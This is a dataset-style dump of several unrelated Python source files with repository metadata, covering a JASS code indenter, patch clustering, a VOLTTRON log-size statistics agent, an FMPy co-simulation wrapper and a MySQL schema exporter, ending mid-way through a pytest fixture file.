2022-03-28T00:25:54.000Z
|
autoindent_code_JASS_war3map_j.py
|
gil9red/SimplePyScripts
|
c191ce08fbdeb29377639184579e392057945154
|
[
"CC-BY-4.0"
] | 8
|
2018-10-03T09:38:46.000Z
|
2021-12-13T19:51:09.000Z
|
autoindent_code_JASS_war3map_j.py
|
gil9red/SimplePyScripts
|
c191ce08fbdeb29377639184579e392057945154
|
[
"CC-BY-4.0"
] | 28
|
2016-08-02T17:43:47.000Z
|
2022-03-21T08:31:12.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
def merge_str_literal(text: str) -> str:
def _on_match(m: re.Match):
return m.group().replace('"+"', '')
return re.sub(r'".+?"(\+".+?")+ ', _on_match, text)
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| 23.258333
| 80
| 0.638839
| 360
| 2,791
| 4.741667
| 0.25
| 0.098418
| 0.094903
| 0.049209
| 0.507323
| 0.437024
| 0.437024
| 0.437024
| 0.437024
| 0.437024
| 0
| 0.041551
| 0.223934
| 2,791
| 119
| 81
| 23.453782
| 0.746537
| 0.032605
| 0
| 0.144928
| 0
| 0
| 0.342194
| 0.123731
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.014493
| 0.014493
| 0.072464
| 0.028986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7bebb9c7d420d8879b0fc07f857afa803296a1
| 5,656
|
py
|
Python
|
python/addNewData.py
|
TruX-DTF/fixminer_source
|
5ab2d6f582743c377eadb21cd466a3a25809bc2d
|
[
"MIT"
] | 5
|
2021-07-19T12:30:00.000Z
|
2022-01-14T16:41:00.000Z
|
python/addNewData.py
|
SerVal-DTF/fixminer_source
|
5ab2d6f582743c377eadb21cd466a3a25809bc2d
|
[
"MIT"
] | 10
|
2020-04-06T09:52:19.000Z
|
2021-06-01T08:05:25.000Z
|
python/addNewData.py
|
SerVal-DTF/fixminer_source
|
5ab2d6f582743c377eadb21cd466a3a25809bc2d
|
[
"MIT"
] | 5
|
2019-08-26T11:02:35.000Z
|
2021-03-23T15:42:09.000Z
|
from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
def core():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
from pairs import shapePairs
matches = shapePairs()
# 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc']
matches = matches[matches.file.apply(lambda x: x in list(pattern.values()) or not ( x.startswith('linux_') or x.startswith('FFmpeg_') or x.startswith('curl_') or x.startswith('nginx_') or x.startswith('openssl_') or x.startswith('redis_') or x.startswith('tmux_') or x.startswith('vlc_')))]
from pairs import createPairs
createPairs(matches)
# # # elif job == 'importShapesPairs':
from pairs import importShape
importShape()
def checkWrongMembers():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
sizeDict = {}
for s in [(i,os.path.getsize(join(clusterPath, root, size, cluster,i))) for i in members]:
sizeDict[s[1]] = s[0]
sizeDict
if len(sizeDict) > 1:
print(join(clusterPath, root, size, cluster))
print(sizeDict.values())
def cluster():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
pairsPath = join(DATA_PATH, 'pairs')
from abstractPatch import loadPairMulti
for root in roots:
matches =loadPairMulti(root,'','shapes')
matches
sizes = matches['sizes'].unique().tolist()
for s in sizes:
match = matches[matches['sizes'] == s]
match
clusterCore(pattern,clusterPath, 'shapes', match, pairsPath, root, s, '')
def clusterCore(pattern,clusterPath, level, match, pairsPath, root, s,action ,token=''):
col_combi = match.tuples.values.tolist()
import networkx
g = networkx.Graph(col_combi)
cluster = []
for subgraph in networkx.connected_component_subgraphs(g):
logging.info('Cluster size %d',len(subgraph.nodes()))
cluster.append(subgraph.nodes())
cluster
pathMapping = dict()
if level == 'actions':
indexFile = join(pairsPath, root, s,action+'.index')
elif level == 'shapes':
indexFile = join(pairsPath, root, s + '.index')
else:
indexFile =join(pairsPath, root, s,action,token+'.index')
df = pd.read_csv(indexFile, header=None, usecols=[0, 1], index_col=[0])
pathMapping = df.to_dict()
workList = []
exportCLusters ={}
if not os.path.exists(join(clusterPath, root, s)):
print()
existingClusters = 0
else:
existingClusters = len(listdir(join(clusterPath, root, s)))
for clus in cluster:
members = [pathMapping[1][int(i)] for i in clus]
members
potentialClusters = [(key, value) for key, value in pattern.items() if key.startswith(root + '/' + s)]
potentialClusters
foundExisting = False
for pc,pcMember in potentialClusters:
if pcMember in members:
pc
foundExisting = True
exportCLusters[pc.split('/')[-1]] = members
if not foundExisting:
exportCLusters[existingClusters] = members
existingClusters= existingClusters+1
exportCLusters
for k,v in exportCLusters.items():
for f in v:
t = f, root, level, clusterPath, s, action, token, k
workList.append(t)
# for idx, clus in enumerate(cluster):
# logging.info('exporting cluster %s %s %s %d', root,s,action,idx)
# for f in clus:
# dumpFile = pathMapping[1][int(f)]
#
# t = dumpFile,root,level,clusterPath,s,action,token,idx
# workList.append(t)
from abstractPatch import dumpFilesCore
parallelRun(dumpFilesCore,workList)
# for wl in workList:
# dumpFilesCore(wl)
| 39.552448
| 299
| 0.592999
| 635
| 5,656
| 5.248819
| 0.2
| 0.040804
| 0.091209
| 0.10141
| 0.415242
| 0.380138
| 0.341134
| 0.341134
| 0.341134
| 0.341134
| 0
| 0.003672
| 0.277758
| 5,656
| 142
| 300
| 39.830986
| 0.81224
| 0.130304
| 0
| 0.357143
| 0
| 0
| 0.036145
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.071429
| 0
| 0.107143
| 0.026786
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8041c5c55101ae0dcfff5c78088fd9a509554f
| 6,805
|
py
|
Python
|
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | 1
|
2020-05-26T01:29:50.000Z
|
2020-05-26T01:29:50.000Z
|
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | null | null | null |
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
LogStatisticsAgent reads the volttron.log file size every hour,
computes the size delta from the previous hour and publishes the difference
with a timestamp. It also publishes the standard deviation every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
Publishes the file's size increment over the previous time interval (60 minutes)
with a timestamp.
Also publishes the standard deviation of the file's hourly size differences
every 24 hours.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers = headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic,
message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(
seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(
next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| 38.885714
| 103
| 0.680235
| 842
| 6,805
| 5.308789
| 0.349169
| 0.026846
| 0.020134
| 0.021477
| 0.146085
| 0.108725
| 0.057718
| 0.038926
| 0.019687
| 0
| 0
| 0.006887
| 0.231888
| 6,805
| 174
| 104
| 39.109195
| 0.848288
| 0.416605
| 0
| 0.052632
| 0
| 0
| 0.108058
| 0.012682
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078947
| false
| 0.013158
| 0.105263
| 0
| 0.223684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8661c1fd9d01528fabb6e5da9f0d2b06361f3b
| 2,857
|
py
|
Python
|
fmpy/cswrapper/__init__.py
|
CSchulzeTLK/FMPy
|
fde192346c36eb69dbaca60a96e80cdc8ef37b89
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | 225
|
2017-05-17T22:33:38.000Z
|
2022-03-29T12:41:52.000Z
|
fmpy/cswrapper/__init__.py
|
CSchulzeTLK/FMPy
|
fde192346c36eb69dbaca60a96e80cdc8ef37b89
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | 381
|
2017-05-20T13:31:52.000Z
|
2022-03-31T08:20:47.000Z
|
fmpy/cswrapper/__init__.py
|
CSchulzeTLK/FMPy
|
fde192346c36eb69dbaca60a96e80cdc8ef37b89
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | 90
|
2017-05-20T13:34:34.000Z
|
2022-03-31T05:14:57.000Z
|
def add_cswrapper(filename, outfilename=None):
from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__
from lxml import etree
import os
from shutil import copyfile, rmtree
if outfilename is None:
outfilename = filename
model_description = read_model_description(filename)
if model_description.fmiVersion != '2.0':
raise Exception("%s is not an FMI 2.0 FMU." % filename)
if model_description.modelExchange is None:
raise Exception("%s does not support Model Exchange." % filename)
unzipdir = extract(filename)
xml = os.path.join(unzipdir, 'modelDescription.xml')
tree = etree.parse(xml)
root = tree.getroot()
# update description
generation_tool = root.attrib.get('generationTool', 'Unknown') + " with FMPy %s Co-Simulation wrapper" % __version__
root.attrib['generationTool'] = generation_tool
# remove any existing <CoSimulation> element
for e in root.findall('CoSimulation'):
root.remove(e)
for i, child in enumerate(root):
if child.tag == 'ModelExchange':
break
model_identifier = '%s_%s_%s' % (model_description.modelExchange.modelIdentifier,
model_description.numberOfContinuousStates,
model_description.numberOfEventIndicators)
e = etree.Element("CoSimulation")
e.attrib['modelIdentifier'] = model_identifier
root.insert(i + 1, e)
tree.write(xml, pretty_print=True, encoding='utf-8')
shared_library = os.path.join(os.path.dirname(__file__), 'cswrapper' + sharedLibraryExtension)
license_file = os.path.join(os.path.dirname(__file__), 'license.txt')
licenses_dir = os.path.join(unzipdir, 'documentation', 'licenses')
if not os.path.isdir(licenses_dir):
os.mkdir(licenses_dir)
copyfile(src=shared_library, dst=os.path.join(unzipdir, 'binaries', platform, model_identifier + sharedLibraryExtension))
copyfile(license_file, os.path.join(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt'))
create_zip_archive(outfilename, unzipdir)
rmtree(unzipdir, ignore_errors=True)
def create_zip_archive(filename, source_dir):
import zipfile
import os
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zf:
base_path = os.path.normpath(source_dir)
for dirpath, dirnames, filenames in os.walk(source_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, os.path.relpath(path, base_path))
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
zf.write(path, os.path.relpath(path, base_path))
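A hedged usage sketch for add_cswrapper above; the FMU filename is a placeholder, and the input must be an FMI 2.0 Model Exchange FMU:
from fmpy.cswrapper import add_cswrapper

# wrap a (hypothetical) Model Exchange FMU so it can also be run in Co-Simulation mode
add_cswrapper('CoupledClutches.fmu', outfilename='CoupledClutches_cs.fmu')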
| 34.841463
| 125
| 0.672384
| 336
| 2,857
| 5.556548
| 0.357143
| 0.054633
| 0.042849
| 0.038565
| 0.162828
| 0.151044
| 0.109266
| 0.080343
| 0.080343
| 0
| 0
| 0.002699
| 0.221911
| 2,857
| 81
| 126
| 35.271605
| 0.837157
| 0.021351
| 0
| 0.115385
| 0
| 0
| 0.109996
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.153846
| 0.019231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe87946e35b940790f2abaab6a2a55e9294ad44f
| 7,305
|
py
|
Python
|
echoscope/source/mysql_source.py
|
treeyh/echoscope
|
ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da
|
[
"MIT"
] | 1
|
2022-01-18T09:19:38.000Z
|
2022-01-18T09:19:38.000Z
|
echoscope/source/mysql_source.py
|
treeyh/echoscope
|
ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da
|
[
"MIT"
] | null | null | null |
echoscope/source/mysql_source.py
|
treeyh/echoscope
|
ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da
|
[
"MIT"
] | 1
|
2022-01-18T09:19:39.000Z
|
2022-01-18T09:19:39.000Z
|
# -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
class MysqlSource(source.Source):
def __init__(self):
self.excludesDb = ['information_schema', 'performance_schema', 'mysql', 'sys', 'test']
def export_model(self, conf: config_model.DataSourceConfig) -> ds_model.DataSourceModel:
mysqlUtil = mysql_util.get_mysql_util(
host=conf.host, port=conf.port, user=conf.user, passwd=conf.passwd, db=conf.db, charset=conf.charset)
ver = self.get_db_version(mysqlUtil)
if ver == '':
logging.error(' mysql conn fail. ')
return
dsm = ds_model.DataSourceModel(
name='%s:%d' % (conf.host, conf.port), dbType=config.DsMysql, version=ver)
dsm.dbs = self.get_export_dbs(mysqlUtil, conf.includes, conf.excludes)
dsm = self.fill_table_fields(mysqlUtil, dsm)
return dsm
def get_db_version(self, conn: mysql_util.MysqlUtil) -> str:
"""获取mysql版本
Args:
conn (mysql_util.MysqlUtil): [description]
Returns:
str: [description]
"""
sql = 'select version() as ver from dual'
cols = ['ver']
ver = conn.find_one(sql, (), cols)
return '' if ver == None else str_util.format_bytes_to_str(ver.get('ver', ''))
def get_export_dbs(self, conn: mysql_util.MysqlUtil, includes: List[str] = [], excludes: List[str] = []) -> List[ds_model.DbModel]:
"""获取需要导出结构的数据库列表
Args:
conn (mysql_util.MysqlUtil): 数据库连接
includes (List[str], optional): 需要包含的数据库列表. Defaults to [].
excludes (List[str], optional): 需要排除的数据库列表. Defaults to [].
Returns:
List[ds_model.DbModel]: 需要导出的数据库列表
"""
sql = 'select SCHEMA_NAME AS db_name, DEFAULT_CHARACTER_SET_NAME as charset, DEFAULT_COLLATION_NAME as collation_name from `information_schema`.SCHEMATA '
cols = ['db_name', 'charset', 'collation_name']
data = conn.find_all(sql, (), cols)
dbs = []
for d in data:
db_name = str_util.format_bytes_to_str(d['db_name'])
if db_name in self.excludesDb or db_name in excludes:
# filtered out
continue
if len(includes) > 0 and db_name not in includes:
# not in the include list
continue
charset = str_util.format_bytes_to_str(d['charset'])
collation_name = str_util.format_bytes_to_str(d['collation_name'])
dbModel = ds_model.DbModel(
name=db_name, charset=charset, collation_name=collation_name)
dbs.append(dbModel)
return dbs
def fill_table_fields(self, conn: mysql_util.MysqlUtil, dsModel: ds_model.DataSourceModel) -> ds_model.DataSourceModel:
"""获取数据库中的表信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表
Returns:
ds_model.DataSourceModel: 数据源
"""
sql = ''' select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' '''
cols = ['TABLE_NAME', 'ENGINE', 'TABLE_COLLATION', 'TABLE_COMMENT']
for db in dsModel.dbs:
data = conn.find_all(sql, (db.name, ), cols)
tables: List[ds_model.TableModel] = []
for d in data:
tableName = str_util.format_bytes_to_str(d['TABLE_NAME'])
comment = str_util.format_bytes_to_str(d['TABLE_COMMENT'])
collation_name = str_util.format_bytes_to_str(d['TABLE_COLLATION'])
engine = str_util.format_bytes_to_str(d['ENGINE'])
table = ds_model.TableModel(
name=tableName, comment=comment, collation_name=collation_name, engine=engine)
logging.info('load table:%s fields.' % tableName)
table.fields = self.get_fields(conn, db.name, tableName)
table.create_script = self.get_create_script(conn, db.name, tableName)
tables.append(table)
db.tables = tables
return dsModel
def get_create_script(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> str:
"""获取表的创建脚本
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名称
tableName (str): 表名称
Returns:
str: 创建脚本
"""
sql = ''' SHOW CREATE TABLE `%s`.`%s` ''' % (dbName, tableName)
cols = ['Table', 'Create Table']
data = conn.find_one(sql, (), cols)
return '' if data == None else str_util.format_bytes_to_str(data.get('Create Table', ''))
def get_fields(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> List[ds_model.FieldModel]:
"""获取数据表中列信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名
tableName (str): 表名
Returns:
List[ds_model.FieldModel]: 列列表
"""
sql = ''' select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC '''
cols = ['TABLE_SCHEMA', 'TABLE_NAME', 'COLUMN_NAME', 'ORDINAL_POSITION', 'COLUMN_DEFAULT',
'IS_NULLABLE', 'DATA_TYPE', 'CHARACTER_MAXIMUM_LENGTH', 'NUMERIC_PRECISION', 'NUMERIC_SCALE',
'CHARACTER_SET_NAME', 'COLLATION_NAME', 'COLUMN_TYPE', 'COLUMN_KEY', 'EXTRA', 'COLUMN_COMMENT']
data = conn.find_all(sql, (dbName, tableName, ), cols)
fields = []
for d in data:
fname = str_util.format_bytes_to_str(d['COLUMN_NAME'])
ftype = str_util.format_bytes_to_str(d['DATA_TYPE'])
column_type = str_util.format_bytes_to_str(d['COLUMN_TYPE'])
length = str_util.format_bytes_to_str(
d['CHARACTER_MAXIMUM_LENGTH']) if d['CHARACTER_MAXIMUM_LENGTH'] != None else str_util.format_bytes_to_str(d['NUMERIC_PRECISION'])
scale = str_util.format_bytes_to_str(d['NUMERIC_SCALE'])
# on update CURRENT_TIMESTAMP
default = str_util.format_bytes_to_str(d['COLUMN_DEFAULT'])
ext = str_util.format_bytes_to_str(d['EXTRA'])
if default == 'CURRENT_TIMESTAMP':
if 'on update CURRENT_TIMESTAMP' in ext:
default = 'update_time'
else:
default = 'create_time'
nullFlag = str_util.format_bytes_to_str(d['IS_NULLABLE'])
comment = str_util.format_bytes_to_str(d['COLUMN_COMMENT'])
charset = str_util.format_bytes_to_str(d['CHARACTER_SET_NAME'])
collation_name = str_util.format_bytes_to_str(d['COLLATION_NAME'])
indexFlag = 0
column_key = str_util.format_bytes_to_str(d['COLUMN_KEY'])
if column_key == 'PRI':
indexFlag = 1
elif column_key == 'UNI':
indexFlag = 3
elif column_key == 'MUL':
indexFlag = 2
indexName = ''
autoInc = False
if 'auto_increment' in ext:
autoInc = True
field = ds_model.FieldModel(name=fname, ftype=ftype, length=length, scale=scale, default=default, nullFlag=nullFlag,
comment=comment, charset=charset, collation_name=collation_name, indexFlag=indexFlag, indexName=indexName, autoInc=autoInc)
fields.append(field)
return fields
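A hedged usage sketch for MysqlSource above; the DataSourceConfig keyword arguments simply mirror the attributes read in export_model and are an assumption, the connection values are placeholders, and a reachable MySQL server is required:
from echoscope.model import config_model
from echoscope.source.mysql_source import MysqlSource

conf = config_model.DataSourceConfig(host='127.0.0.1', port=3306, user='root',
                                     passwd='secret', db='', charset='utf8mb4',
                                     includes=['demo_db'], excludes=[])  # assumed signature
ds = MysqlSource().export_model(conf)
for db in ds.dbs:
    for table in db.tables:
        print(db.name, table.name, len(table.fields))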
| 39.701087
| 411
| 0.675975
| 951
| 7,305
| 4.921136
| 0.178759
| 0.032906
| 0.061111
| 0.075214
| 0.379915
| 0.350214
| 0.296154
| 0.247009
| 0.13141
| 0.103419
| 0
| 0.001034
| 0.205613
| 7,305
| 183
| 412
| 39.918033
| 0.805445
| 0.113895
| 0
| 0.046296
| 0
| 0.018519
| 0.240057
| 0.036286
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064815
| false
| 0.009259
| 0.055556
| 0
| 0.194444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8a7abf97fc4938deedb4a0e775164e6040fb1b
| 1,042
|
py
|
Python
|
test-drf-project/tests/conftest.py
|
fvlima/drf-view-profiler
|
a61d48e9835679f812d69d24ea740b947836108c
|
[
"MIT"
] | 30
|
2019-10-16T12:48:16.000Z
|
2021-11-23T08:57:27.000Z
|
test-drf-project/tests/conftest.py
|
fvlima/drf-view-profiler
|
a61d48e9835679f812d69d24ea740b947836108c
|
[
"MIT"
] | null | null | null |
test-drf-project/tests/conftest.py
|
fvlima/drf-view-profiler
|
a61d48e9835679f812d69d24ea740b947836108c
|
[
"MIT"
] | 1
|
2021-11-23T07:28:04.000Z
|
2021-11-23T07:28:04.000Z
|
from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
@pytest.fixture
